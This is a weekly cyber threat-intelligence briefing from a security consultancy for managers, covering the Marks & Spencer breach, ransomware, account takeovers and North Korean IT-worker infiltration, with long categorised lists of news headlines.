Ireland's DPC fined TikTok €530M for sending EU user data to China
The nation’s cyber community is quietly rebelling against Trump’s changes - POLITICO
Cut CISA & Everyone Pays for It
Offensive cyber security to be emphasized by Trump admin, official says | SC Media
TikTok Fined €530 Million Over Chinese Access to EU Data
Signal app clone used by Trump's administration was hacked in less than 30 mins - SiliconANGLE
White House Proposal Slashes Half-Billion From CISA Budget - SecurityWeek
Sen. Murphy: Trump administration has ‘illegally gutted funding for cyber security’ | CyberScoop
The Signal Clone Mike Waltz Was Caught Using Has Direct Access to User Chats | WIRED
The Trump Administration Sure Is Having Trouble Keeping Its Comms Private | WIRED
Models, Frameworks and Standards
UK Cyber Essentials Certification Numbers Falling Short - Infosecurity Magazine
Data Protection
Ireland's DPC fined TikTok €530M for sending EU user data to China
Careers, Working in Cyber and Information Security
The 14 most valuable cyber security certifications | CSO Online
Europe leads shift from cyber security ‘headcount gap’ to skills-based hiring | Computer Weekly
Law Enforcement Action and Take Downs
Despite Arrests, Scattered Spider Continues Hacking
War on cyber crime: why disrupting attacker infrastructure is critical for security
Israel Nabs Suspect Sought by US Over $190M Nomad Bridge Exploit: Report - Decrypt
Polish authorities arrested 4 people behind DDoS-for-hire platforms
Europol Take Down DDoS-for-Hire Empire & Arrested 4 Admins
Three Brits charged over US, Canada swattings • The Register
Ukrainian Nefilim Ransomware Affiliate Extradited to US - SecurityWeek
US Charges Yemeni Hacker Behind Black Kingdom Ransomware Targeting 1,500 Systems
Disney Slack hacker was Californian, not Russian: DoJ • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Cyber Warfare's Limitations: Lessons for Future Conflicts
41 Countries Taking Part in NATO's Locked Shields 2025 Cyber Defence Exercise - SecurityWeek
Cyber Warfare Funding Accelerates and Everyone is at Risk - Security Boulevard
Nuclear warheads and cyber attacks: How UK must react to Russia threat
Could striking first in cyber be new Pentagon policy? - Defense One
Countries Begin NATO's Locked Shields Cyber-Defence Exercise
Nation State Actors
Nation-State Actors Continue to Exploit Weak Passwords, MFA
Hostile nation states are ramping up cyber attacks on UK, warns GCHQ | This is Money
China
Don’t plug phones into Chinese electric cars, defence firms say
White House Warns China of Cyber Retaliation Over Infrastructure Hacks - Infosecurity Magazine
Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
'CoGUI' Phishing Kit Helps Chinese Hackers Target Japan
Ireland's DPC fined TikTok €530M for sending EU user data to China
TikTok Fined €530 Million Over Chinese Access to EU Data
Trump promises protection for TikTok as sale deadline nears • The Register
Russia
UK at risk of Russian cyber and physical attacks as Ukraine seeks peace deal
Nuclear warheads and cyber attacks: How UK must react to Russia threat
Google identifies new malware linked to Russia-based hacking group | Reuters
Poland says Russia is trying to interfere in presidential election | Reuters
Security Researchers Warn a Widely Used Open Source Tool Poses a 'Persistent' Risk to the US | WIRED
Pro-Russian hackers claim to have targeted several UK websites | Cybercrime | The Guardian
Convicted Russian spies attended Brexit event in Parliament - BBC News
North Korea
North Korean hackers show telltale signs, researchers say | SC Media
How to spot and expose fraudulent North Korean IT workers | TechTarget
Tools and Controls
Email-Based Attacks Top Cyber Insurance Claims
UK retail cyber-attacks underscore the case for resilience over reactivity
Building a resilient mindset | The Independent
Cyber resilience is the strategy: Why business and security must align now | SC Media
Security Tools Alone Don't Protect You — Control Effectiveness Does
Personal data of top executives easily found online - Help Net Security
Are You Too Reliant on Third-Party Vendors for Cyber Security? - Security Boulevard
41 Countries Taking Part in NATO's Locked Shields 2025 Cyber Defence Exercise - SecurityWeek
Hacker Finds New Technique to Bypass SentinelOne EDR Solution - Infosecurity Magazine
How CISOs can talk cyber security so it makes sense to executives - Help Net Security
CIOs pay too much for not enough IT security | CIO Dive
CISO vs CFO: why are the conversations difficult? | CSO Online
What it really takes to build a resilient cyber program - Help Net Security
A guide to cyber liability insurance for a small business
How OSINT supports financial crime investigations - Help Net Security
Microsoft enforces strict rules for bulk emails on Outlook - gHacks Tech News
81% of High-Uncertainty Middle-Market Firms Delay Tech Initiatives
How to use PC sandbox apps to test dubious files safely | PCWorld
Countries Begin NATO's Locked Shields Cyber-Defence Exercise
ABA & Cyber Insurance: Essential IT Requirements for Small Law Firms - LexBlog
Reports Published in the Last Week
Other News
UK businesses lost £64bn to cyber-attacks over a three-year period - UKTN
Hostile nation states are ramping up cyber attacks on UK, warns GCHQ | This is Money
The SMB Cyber Security Gap: High Awareness, Low Readiness | MSSP Alert
"Nationally Significant" Cyber-Attacks Have Doubled, UK’s NCSC Reports - Infosecurity Magazine
UK Cyber Insurance Claims Second Highest on Record - Infosecurity Magazine
Half of Irish firms have fallen victim to cyber crime in past five years
Delta Air Lines class action cleared for takeoff • The Register
US tells CNI orgs to stop connecting OT kit to the web | Computer Weekly
US government warns of "unsophisticated" hackers targeting oil and gas systems | TechRadar
Almost half of Flemish companies suffered cyber attack last year
Cyber Attacks Targeting US Increased by 136% | Security Magazine
Countries Begin NATO's Locked Shields Cyber-Defence Exercise
Vulnerability Management
Why Android users should care more about monthly security updates
What a future without CVEs means for cyber defence - Help Net Security
Cut CISA & Everyone Pays for It
White House Proposal Slashes Half-Billion From CISA Budget - SecurityWeek
Life Without CVEs? It's Time to Act
Vulnerabilities
Update ASAP: Google Fixes Android Flaw (CVE-2025-27363) Exploited by Attackers
PoC Published for Exploited SonicWall Vulnerabilities - SecurityWeek
Chinese Hackers Exploit SAP RCE Flaw CVE-2025-31324, Deploy Golang-Based SuperShell
Hackers Selling SS7 0-Day Vulnerability on Hacker Forums for $5000
Second Wave of Attacks Targets SAP NetWeaver | MSSP Alert
Cisco Patches CVE-2025-20188 (10.0 CVSS) in IOS XE That Enables Root Exploits via JWT
Cisco Patches 35 Vulnerabilities Across Several Products - SecurityWeek
FBI: End-of-life routers hacked for cyber crime proxy networks
Researcher Says Fixed Commvault Bug Still Exploitable
SysAid Patches 4 Critical Flaws Enabling Pre-Auth RCE in On-Premise Version
Improperly Patched Samsung MagicINFO Vulnerability Exploited by Botnet - SecurityWeek
Apache Parquet exploit tool detect servers vulnerable to critical flaw
Microsoft Warns of Attackers Exploiting Misconfigured Apache Pinot Installations - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 02 May 2025
Black Arrow Cyber Threat Intelligence Briefing 02 May 2025:
-M&S ‘Had No Plan’ for Cyber Attacks, with Staff Sleeping in the Office Amid ‘Paranoia’ and ‘Chaos’
-More than 60% of Organisations Are Insufficiently Prepared to Address Urgent Geopolitical, Cyber Security, and Regulatory Risks
-Fake Payments, Receipts and Invoices on the Rise
-Account Takeovers: A Growing Threat to Your Business and Customers
-North Korean Operatives Have Infiltrated Hundreds of Fortune 500 Companies
-Phone Theft Is Turning into a Serious Cyber Security Risk
-Why Cyber Resilience Must be Part of Every Organisation’s DNA
-Compliance Management In 2025: Ensuring Your Security Strategy Meets Regulatory Demands
-Ransomware Attacks are Getting Smarter, Harder to Stop
-People Know Password Reuse Is Risky but Keep Doing It Anyway
-A Cyber Security Paradox: Even Resilient Organisations Are Blind to AI Threats
-Securing the Invisible: Supply Chain Security Trends
-Don’t Overlook the BISO Role When it Comes to Growth and Continuity
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Exec Summary
Our review this week starts with the high-profile breach at UK retailer Marks & Spencer, which has severely impacted operations and employees for over a week, with reports that the organisation had not tested their cyber incident plan. Similar issues are evident across other sectors, with over 60% of firms globally reporting poor readiness for cyber, geopolitical, and AI-related threats.
Cyber resilience is a recurring theme in this week’s threat intelligence review. At Black Arrow Cyber, we recommend organisations test their response plan, such as through our simulation exercises where impartial experts help the leadership team to uncover and address misconceptions regarding IT provision or operational resilience. Such exercises are required by many cyber frameworks and regulations, including the UK’s Cyber Governance Code of Practice.
We also report on attack types including ransomware, account takeover, and AI-fuelled scams that produce fake receipts indistinguishable from the real thing. These developments strain traditional defences and expose critical gaps in resilience. The growing concern around insider risk, particularly the infiltration of major firms by North Korean operatives, reminds business leaders that threats are not always external.
Encouragingly, board-level awareness is growing, with more organisations recognising that cyber resilience must be embedded into company culture and governance. Black Arrow believes the growing prominence of roles like the Business Information Security Officer (BISO), which many of our services emulate, signals a necessary shift toward strategic, business-aligned security leadership and greater resilience against cyber incidents.
Top Cyber Stories of the Last Week
M&S ‘Had No Plan’ for Cyber Attacks, with Staff Sleeping in the Office Amid ‘Paranoia’ and ‘Chaos’
UK retailer Marks & Spencer continues to grapple with a severe cyber attack that has disrupted online orders and recruitment for over a week, with insiders warning full recovery may take months. Reports indicate the retailer lacked a cyber attack or business continuity plan, leaving staff to respond reactively, with some staff describing sleeping in offices and using personal devices amid confusion and shifting internal guidance. The situation has led to significant operational disruption and employee concern over whether hackers remain inside the system. Harrods and the Co-op Group have also been targeted in recent days, highlighting a broader wave of attacks. The Cabinet Office has warned that such incidents should serve as a wake-up call for all UK businesses to prioritise cyber security.
More than 60% of Organisations Are Insufficiently Prepared to Address Urgent Geopolitical, Cyber Security, and Regulatory Risks
AlixPartners’ 2025 Global Risk Survey reveals that over 60% of organisations feel underprepared to manage rising geopolitical, cyber security, and regulatory risks. Nearly three quarters are not ready for international regulatory changes, while 68% are unprepared for AI-related threats despite widespread adoption. Although 63% are investing in technology to combat financial crime, only 44% find it highly effective. Most also lack readiness for cyber security incidents and data privacy breaches. With nearly 70% anticipating increased corporate litigation, many are boosting legal budgets, highlighting a growing need for strategic risk management amid ongoing global volatility.
Fake Payments, Receipts and Invoices on the Rise
The rise of generative AI and poorly implemented automation is fuelling a surge in fake payments, receipts and invoices, putting businesses, particularly SMEs, at greater risk of financial loss. A third of firms were hit by invoice fraud in 2024, often due to weak controls around payment matching. New scams range from fake banking apps, to AI-generated receipts indistinguishable from genuine ones. While government initiatives like the Cyber Governance Code of Practice and the forthcoming Cyber Security and Resilience Bill offer promise, there remains a gap between awareness and action, especially among smaller organisations.
Account Takeovers: A Growing Threat to Your Business and Customers
Account takeovers are rapidly emerging as one of the most costly and damaging cyber threats facing businesses today, with annual losses exceeding $5 billion in the US alone. These attacks occur when criminals gain unauthorised access to legitimate user accounts, often through tactics like credential stuffing, phishing, and SIM swapping. Once inside, attackers can steal funds and personal data, or lock out genuine users. Despite their growing sophistication, many organisations remain underprepared. The financial and reputational fallout can be severe, but proactive steps such as multi-factor authentication, behavioural analytics, and continuous monitoring can significantly reduce the risk.
North Korean Operatives Have Infiltrated Hundreds of Fortune 500 Companies
Security experts from Mandiant and Google Cloud have warned that hundreds of Fortune 500 firms have unknowingly hired North Korean IT workers, with most CISOs admitting to at least one such hire. These operatives, embedded as full-time staff, are earning six-figure salaries, generating an estimated $100 million annually for North Korea’s regime. While initially a financial operation, this threat has evolved, with some dismissed workers resorting to extortion. There is growing concern that these individuals could disrupt services or leak sensitive data, particularly as some have been linked to North Korea’s intelligence services and previous destructive cyber operations.
Phone Theft Is Turning into a Serious Cyber Security Risk
Phone theft is evolving into a significant cyber security risk, with the UK’s Metropolitan Police seizing 1,000 devices a week and Europol uncovering a network affecting over 480,000 victims worldwide. Many organisations still underestimate the risk posed by mobile devices, with only 63% able to track both BYOD and corporate phones. Poor controls and misplaced trust in default security features leave gaps that attackers can exploit to access corporate systems. Without clear response plans or robust mobile device management, stolen smartphones, often more data-rich than laptops, can become a gateway to wider breaches, especially when used for multi-factor authentication.
Why Cyber Resilience Must be Part of Every Organisation’s DNA
LevelBlue’s 2025 Futures Report highlights that while AI adoption is accelerating, only 29% of executives feel prepared for AI-powered threats, despite 42% expecting them. Deepfake attacks are anticipated by 44%, yet just 32% say they’re ready. Nearly half admit they must improve defences against AI-driven adversaries, and 41% are already seeing a significant rise in attacks. Encouragingly, 45% now view cyber resilience as a company-wide priority, up from 27% last year, with 68% noting increased C-suite focus due to media coverage of major breaches. The report urges leaders to embed resilience at board level, invest early, and foster a cyber-aware culture.
Compliance Management In 2025: Ensuring Your Security Strategy Meets Regulatory Demands
Compliance management in 2025 has become more complex and critical, with organisations facing heightened regulatory scrutiny and rising cyber threats. New laws across data privacy, ESG, and third-party risk demand proactive, data-driven compliance. Real-time monitoring and integration of AI and automation are increasingly used to detect risks and improve reporting accuracy. The cost of non-compliance is growing, making alignment between cyber security and regulatory strategy essential. Frameworks and certifications like NIST and ISO 27001, along with RegTech solutions, are now key to building resilient, scalable systems. Organisations must prioritise cross-functional collaboration and continuous improvement to remain secure and compliant.
Ransomware Attacks are Getting Smarter, Harder to Stop
Ransomware remains a critical threat, with 69% of organisations hit in the past year despite growing collaboration between IT and security teams. Yet only 10% of victims recovered over 90% of their data, while more than half recovered less than 50%. The shift toward data exfiltration and double extortion is accelerating, with attackers striking within hours. While ransom payments are declining and 36% of victims refused to pay, recovery gaps persist. Firms investing in data resilience recover up to seven times faster, but only 44% verify backups regularly. These findings underscore the need for proactive, well-practised cyber resilience strategies across the business.
People Know Password Reuse Is Risky but Keep Doing It Anyway
Bitwarden’s research reveals a concerning disconnect between awareness and behaviour when it comes to password security. While 79% of Gen Z acknowledge the risks of password reuse, 59% still recycle passwords after a breach. Over half of respondents have abandoned accounts to avoid password resets, and only 10% always update compromised credentials. Despite this, younger generations are more inclined to enable multi-factor authentication (MFA). Insecure sharing practices persist, with 25% of Gen Z using text messages to share passwords. The report highlights a clear need for targeted education across all age groups, especially among decision-makers.
A Cyber Security Paradox: Even Resilient Organisations Are Blind to AI Threats
LevelBlue’s latest report reveals a growing gap in AI risk awareness among otherwise cyber-resilient organisations. While 94% of these firms invest in software supply chain security, compared to just 62% overall, they remain largely blind to the risks introduced by rapid AI adoption. Only 30% of executives acknowledged increased AI-related supply chain threats. Many resilient organisations may be overlooking how underregulated AI tools expand their attack surface. The report stresses that cyber resilience now demands shared leadership responsibility, proactive risk management, and readiness for both incident response and business continuity.
Securing the Invisible: Supply Chain Security Trends
Supply chain attacks are evolving, with adversaries exploiting trusted software, hardware, and vendor relationships to bypass traditional defences. Continuous monitoring of third-party risk is replacing one-off assessments, as CISOs extend visibility across the extended enterprise. Real-time data, blockchain traceability, and AI-driven threat detection are now essential tools. Software Bills of Materials (SBOMs) have become operational necessities, helping firms assess exposure during emerging threats. Regulatory pressure is growing, with the EU’s DORA and NIS2 setting new expectations. Yet, only a third of supply chain leaders use GenAI tools designed for their domain despite 97% already using the technology in some form.
Don’t Overlook the BISO Role When it Comes to Growth and Continuity
The role of the Business Information Security Officer (BISO) is gaining traction as organisations recognise cyber risk as a critical business risk. BISOs act as a bridge between security teams and the C-suite, helping drive investment in proactive, cost-effective cyber strategies. With ransomware and extortion attacks on the rise, and the average cost of an incident now around $677 million, BISOs help quantify risk, improve resilience, and align security with broader business goals. Though adoption is still growing, more firms are realising the BISO’s value in fostering innovation, operational continuity, and modern cyber hygiene across the enterprise. Many of the services provided by Black Arrow fulfil the function of an internal BISO; talk to us to see how we can help you achieve your objectives in a cost effective and impartial manner.
Sources:
https://cyberscoop.com/north-korea-workers-infiltrate-fortune-500/
https://www.helpnetsecurity.com/2025/05/02/phone-theft-cybersecurity-threat/
https://www.helpnetsecurity.com/2025/04/30/rethink-cyber-resilience/
https://cybersecuritynews.com/compliance-management-in-2025/
https://www.helpnetsecurity.com/2025/04/28/companies-impacted-ransomware-attacks/
https://www.helpnetsecurity.com/2025/05/02/passwords-update-security-risks/
https://www.darkreading.com/cyber-risk/even-resilient-organizations-bind-ai-threats
https://www.helpnetsecurity.com/2025/04/30/supply-chain-security-trends/
https://www.techradar.com/pro/dont-overlook-the-biso-role-when-it-comes-to-growth-and-continuity
Governance, Risk and Compliance
You're Probably Not Taking Cyber Security Seriously Enough - Above the Law
Don’t overlook the BISO role when it comes to growth and continuity | TechRadar
No longer optional: Cyber risk oversight for boards | American Banker
Stronger Together: Why IT And Security Collaboration Is Business Critical
Compliance Management In 2025: Ensuring Your Security Strategy Meets Regulatory Demands
Gartner: enabling cyber security amid geopolitical rifts | TechRadar
CISOs Call for Streamlined Global Cyber Rules | MSSP Alert
What is a Risk Map (Risk Heat Map)? | Definition from TechTarget
How CISOs Can Leverage Threat Intelligence to Stay Proactive
The CISO’s Role In Ensuring Compliance Amid Evolving Cyber Threats
Half of CIOs lack access to appropriate cyber security tools for their business - Business Plus
The Expanding Role of CISOs in Tech and Corporate Governance
Why CISOs Are Key to Integrating ESG and Cyber Security - Cyber Security News
From compliance to culture: Making security part of our daily routines
How to survive as a CISO aka 'chief scapegoat officer' • The Register
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware attacks are getting smarter, harder to stop - Help Net Security
Ransomware Group Hacks Webcam to Evade Endpoint Defences
The 5 Emerging Cyber Attack Techniques Poised to Disrupt
6 major supply chain cyber security risks in 2025| Cybernews
DragonForce expands ransomware model with white-label branding scheme
Law Enforcement Crackdowns Drive Novel Ransomware Affiliate Schemes - Infosecurity Magazine
Prolific RansomHub Operation Goes Dark
Emerging Threat Actor Hellcat Exemplifies Continued Innovation in Ransomware TPPs | MSSP Alert
The 5,365 Ransomware Attack Rampage — What You Need To Know
Ransomware Attacks on Critical Infrastructure Surge, Reports FBI | Tripwire
Ransomware Victims
Marks & Spencer breach linked to Scattered Spider ransomware attack
M&S market value falls £700m amid cyber attack
Some M&S stores left with empty shelves after cyber attack - BBC News
M&S report warned of cyber threats year before hack
How ‘native English’ Scattered Spider group linked to M&S attack operate | Cybercrime | The Guardian
Co-op hit by cyber attack as back-office systems disrupted
M&S stops hiring after systems taken offline due to cyber attack
Top security body urges retailers to act following Marks & Spencer cyber attack | Retail Week
M&S: WFH staff locked out of systems amid cyber attack fallout - Retail Gazette
Harrods is latest retailer to be hit by cyber-attack | Harrods | The Guardian
Co-op cyber attack: Staff told to keep cameras on in meetings - BBC News
M&S cyber attack: Retailer working 'day and night' to manage impact - BBC News
M&S and Co-op: UK retailers brace for cyber attacks
Retail cyber attacks sound alarm for food manufacturing supply chains
Warning hackers may ‘try their luck’ with other retailers as M&S issues update | The Independent
Almost a million patients hit by Frederick Health data breach | TechRadar
Phishing & Email Based Attacks
Low-tech phishing attacks are gaining ground - Help Net Security
Same Inbox, New Tricks: A Look At The Email Threat Landscape In Q1 2025
This Email Sounds Like It Came From Your Boss. But It Didn’t. | Symantec Enterprise Blogs
Phishers Take Advantage of Iberian Power Outage
Why MFA is getting easer to bypass and what to do about it - Ars Technica
Criminals are pretending to be Microsoft, Google, and Apple in phishing attacks | TechRadar
A large-scale phishing campaign targets WordPress WooCommerce users
Large-Scale Phishing Campaigns Target Russia and Ukraine - Infosecurity Magazine
Other Social Engineering
North Koreans Still Working Hard to Take Your IT Job: 'Any Organisation Is a Target' | PCMag
There's one question that stumps North Korean fake workers • The Register
Mobile security is a frontline risk. Are you ready? - Help Net Security
North Korean operatives have infiltrated hundreds of Fortune 500 companies | CyberScoop
Fraud, Scams and Financial Crime
Cyber security: fake payments, receipts and invoices on the rise | ICAEW
Government Set to Ban SIM Farms in European First - Infosecurity Magazine
WhatsApp, Signal scam leads to Microsoft account hacks [April 2025] | Mashable
PayPal Red Alert Issued After 600% Increase In Scams Recorded in 2025: What You Need To Know
Online fraud peaks as breaches rise - Help Net Security
Mystery Box Scams Deployed to Steal Credit Card Data - Infosecurity Magazine
Gig-Work Platforms at Risk for Data Breaches, Fraud, Account Takeovers
Third-party applications for online banking give fraudsters access to your money - Cyberpolice | УНН
Artificial Intelligence
The 5 Emerging Cyber Attack Techniques Poised to Disrupt
Enterprises Need to Beware of These 5 Threats
AI and automation shift the cyber security balance toward attackers - Help Net Security
Even Cyber Resilient Organisations Struggle to Comprehend AI Risks
AI, Automation & Dark Web Fuel Evolving Threat Landscape
The Next Two Years In AI Cyber Security For Business Leaders
4 lessons in the new era of AI-enabled cyber crime | TechTarget
Agentic AI Systems Pose Alarming API Security Risks
Ex-NSA cyber boss: AI will soon be a great exploit dev • The Register
Claude AI Exploited to Operate 100+ Fake Political Personas in Global Influence Campaign
Forthcoming NIST profile to address growing AI-cyber challenges - Nextgov/FCW
South Korea says DeepSeek transferred user data, prompts without consent | Reuters
Microsoft’s AI Starts Secretly Copying And Saving Your Messages
60% of AI agents are embedded in IT departments - here's what they're doing | ZDNET
End users can code with AI, but IT must be wary | TechTarget
Drones may strike targets with no human input, says minister
2FA/MFA
Why MFA is getting easer to bypass and what to do about it - Ars Technica
Malware
CEO of cyber security firm charged with installing malware on hospital systems
Infosec pro blabs about alleged malware mishap on LinkedIn • The Register
New WordPress Malware Masquerades as Plugin - Infosecurity Magazine
Novel Gremlin Stealer malware emerges | SC Media
WordPress plugin disguised as a security tool injects backdoor
Malware Steals 1.7 Billion Passwords — Publishes Them To Dark Web
Hackers abuse IPv6 networking feature to hijack software updates
DarkWatchman cyber crime malware returns on Russian networks | The Record from Recorded Future News
Hive0117 group targets Russian firms with new variant of DarkWatchman malware
Mobile
Mobile security is a frontline risk. Are you ready? - Help Net Security
Phone theft is turning into a serious cyber security risk - Help Net Security
Mobile Applications: A Cesspool of Security Issues
Government Set to Ban SIM Farms in European First - Infosecurity Magazine
Half of Mobile Devices Run Outdated Operating Systems - Infosecurity Magazine
iOS and Android juice jacking defences have been trivial to bypass for years - Ars Technica
Google’s Play Store lost nearly half its apps | The Verge
Denial of Service/DoS/DDoS
DDoS attacks jump 358% compared to last year - Help Net Security
DDoS attacks in 2025 have already surpassed the 2024 total | TechRadar
Pro-Russian hackers strike Dutch municipalities with coordinated DDoS attack | NL Times
Internet of Things – IoT
Vehicles Face 45% More Attacks, 4 Times More Hackers
Data Breaches/Leaks
SAS names and ranks reportedly available online for a decade - BBC News
Malware Steals 1.7 Billion Passwords — Publishes Them To Dark Web
Signalgate: Security culture? America's screwed • The Register
27 million French electronics giant’s customer records leaked online | Cybernews
Commvault says recent breach didn't impact customer backup data
Ascension discloses second major cyber attack in a year • The Register
Gig-Work Platforms at Risk for Data Breaches, Fraud, Account Takeovers
African multinational telco giant MTN disclosed a data breach
Banking details of thousands of Aussies stolen by cyber criminals
ANY.RUN warns free-tier users of data exposure | Cybernews
Almost a million patients hit by Frederick Health data breach | TechRadar
Employee monitoring app exposes 21M work screens | Cybernews
Nova Scotia Power cyber attack impacts customer billing accounts | Cybernews
Organised Crime & Criminal Actors
Cyber criminals switch up their top initial access vectors of choice | CSO Online
Europol Creates “Violence-as-a-Service” Taskforce - Infosecurity Magazine
Cyber defenders need to remember their adversaries are human, says Trellix research head | IT Pro
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Storm-1977 Hits Education Clouds with AzureChecker, Deploys 200+ Crypto Mining Containers
Solana DeFi protocol Loopscale hit with $5.8 million exploit two weeks after launch | The Block
Insider Risk and Insider Threats
People know password reuse is risky but keep doing it anyway - Help Net Security
Infosec pro blabs about alleged malware mishap on LinkedIn • The Register
Ex-Disney employee gets three years in prison for menu hacks • The Register
North Koreans Still Working Hard to Take Your IT Job: 'Any Organisation Is a Target' | PCMag
North Korean operatives have infiltrated hundreds of Fortune 500 companies | CyberScoop
Insurance
Reducing Cyber Insurance Costs - CISO Proactive Measures
How Organisations Can Leverage Cyber Insurance Effectively
Supply Chain and Third Parties
6 major supply chain cyber security risks in 2025| Cybernews
Half of red flags in third-party deals never reach compliance teams - Help Net Security
Securing the invisible: Supply chain security trends - Help Net Security
Cloud/SaaS
Over 90% of Cyber Security Leaders Worldwide Encountered Cyber Attacks Targeting Cloud Environments
JPMorgan CISO Warns of SaaS Security Risks - Infosecurity Magazine
Storm-1977 Hits Education Clouds with AzureChecker, Deploys 200+ Crypto Mining Containers
Dropbox, OneDrive Abused In Massive Southeast Asia Cyber-Espionage Operation
Outages
Oracle engineers caused dayslong software outage at U.S. hospitals
Identity and Access Management
Identity and Access Management (IAM) - The CISO’s Core Focus in Modern Cyber Security
Encryption
Quantum computer threat spurring quiet overhaul of internet security | CyberScoop
Passwords, Credential Stuffing & Brute Force Attacks
People know password reuse is risky but keep doing it anyway - Help Net Security
Some of you still use these awful passwords today
Account Takeovers: A Growing Threat to Your Business and Customers - Security Boulevard
Law Enforcement Can Break 77% Of ‘Three Random Word’ Passwords
Malware Steals 1.7 Billion Passwords — Publishes Them To Dark Web
Microsoft Confirms Password Spraying Attack — What You Need To Know
46% of the most trusted US companies' employees reuse
CISOs should re-consider using Microsoft RDP due to password flaw, says expert | CSO Online
Regulations, Fines and Legislation
Government Set to Ban SIM Farms in European First - Infosecurity Magazine
Compliance Management In 2025: Ensuring Your Security Strategy Meets Regulatory Demands
CISOs Call for Streamlined Global Cyber Rules | MSSP Alert
The CISO’s Role In Ensuring Compliance Amid Evolving Cyber Threats
Tariffs could slow replacement of telecom networks, according to industry official | CyberScoop
UK and Canadian Regulators Demand Robust Data Protection Amid 23andMe - Infosecurity Magazine
Former CISA head slams Trump for 'dangerously degrading' US cyber defences | Cybernews
Signalgate: Security culture? America's screwed • The Register
House passes bill to study routers’ national security risks | CyberScoop
FBI steps in amid rash of politically charged swattings • The Register
8 in 10 Brits support biometrics, personal data collection for national security | Biometric Update
The risks of standing down: Why halting US cyber ops against Russia erodes deterrence | CSO Online
CVE board 'kept in the dark' on funding, members say • The Register
Models, Frameworks and Standards
Will UK Cyber Reforms Keep Step with NIS2? | DLA Piper - JDSupra
Forthcoming NIST profile to address growing AI-cyber challenges - Nextgov/FCW
MoD publishes Secure by Design problem book to bolster cyber resilience | UKAuthority
Backup and Recovery
Commvault says recent breach didn't impact customer backup data
Data Protection
UK and Canadian Regulators Demand Robust Data Protection Amid 23andMe - Infosecurity Magazine
Law Enforcement Action and Take Downs
Ex-Disney employee gets three years in prison for menu hacks • The Register
Europol Creates “Violence-as-a-Service” Taskforce - Infosecurity Magazine
Leaders of 764, global child sextortion group, arrested and charged | CyberScoop
Law Enforcement Can Break 77% Of ‘Three Random Word’ Passwords
Misinformation, Disinformation and Propaganda
Claude AI Exploited to Operate 100+ Fake Political Personas in Global Influence Campaign
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
China
China is America's No.1 cyber threat and the US must react • The Register
House passes bill to study routers’ national security risks | CyberScoop
Chinese Hacking Competitions Fuel the Country’s Broad Cyber Ambitions - Bloomberg
China's Secret Weapon? How EV Batteries Could Be Weaponized to Disrupt America - SecurityWeek
Chinese APT's Adversary-in-the-Middle Tool Dissected - SecurityWeek
How Space Force Plans To Protect The US From Chinese & Russian Spy Satellites
Tariffs could slow replacement of telecom networks, according to industry official | CyberScoop
South Korea says DeepSeek transferred user data, prompts without consent | Reuters
Russia
Russia-linked group Nebulous Mantis targets NATO-related defence organisations
France ties Russian APT28 hackers to 12 cyber attacks on French orgs
Putin's Attacks on Ukraine Rise 70%, With Little Effect
Trump cuts US cyber aid to Ukraine, opening doors to Russian attacks | Cryptopolitan
How Space Force Plans To Protect The US From Chinese & Russian Spy Satellites
The risks of standing down: Why halting US cyber ops against Russia erodes deterrence | CSO Online
Pro-Russian hackers strike Dutch municipalities with coordinated DDoS attack | NL Times
Poland’s state registry temporarily blocked by cyber incident | The Record from Recorded Future News
Large-Scale Phishing Campaigns Target Russia and Ukraine - Infosecurity Magazine
DarkWatchman cyber crime malware returns on Russian networks | The Record from Recorded Future News
Hive0117 group targets Russian firms with new variant of DarkWatchman malware
Iran
North Korea
North Koreans Still Working Hard to Take Your IT Job: 'Any Organisation Is a Target' | PCMag
There's one question that stumps North Korean fake workers • The Register
North Korean operatives have infiltrated hundreds of Fortune 500 companies | CyberScoop
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Dropbox, OneDrive Abused In Massive Southeast Asia Cyber-Espionage Operation
Tools and Controls
No longer optional: Cyber risk oversight for boards | American Banker
Why cyber resilience must be part of every organisation's DNA - Help Net Security
Over 90% of Cyber Security Leaders Worldwide Encountered Cyber Attacks Targeting Cloud Environments
Identity and Access Management (IAM) - The CISO’s Core Focus in Modern Cyber Security
How Organisations Can Leverage Cyber Insurance Effectively
How the hybrid work boom reshapes corporate security | TechRadar
SentinelOne says security vendors are under attack | Cybernews
The CISO’s Guide to Managing Cyber Risk in Hybrid Workplaces
CISOs should re-consider using Microsoft RDP due to password flaw, says expert | CSO Online
CISOs Take Note: Is Needless Cyber Security Strangling Your Business?
What is a Risk Map (Risk Heat Map)? | Definition from TechTarget
How CISOs Can Leverage Threat Intelligence to Stay Proactive
Why CISOs Are Key to Integrating ESG and Cyber Security - Cyber Security News
Commvault says recent breach didn't impact customer backup data
The Hidden Risks of Over-Relying on AI in Cyber Security | MSSP Alert
21 million employee screenshots leaked in bossware breach blunder
Cloud Security Essentials - CISO Resource Toolkit
Employee monitoring app exposes 21M work screens | Cybernews
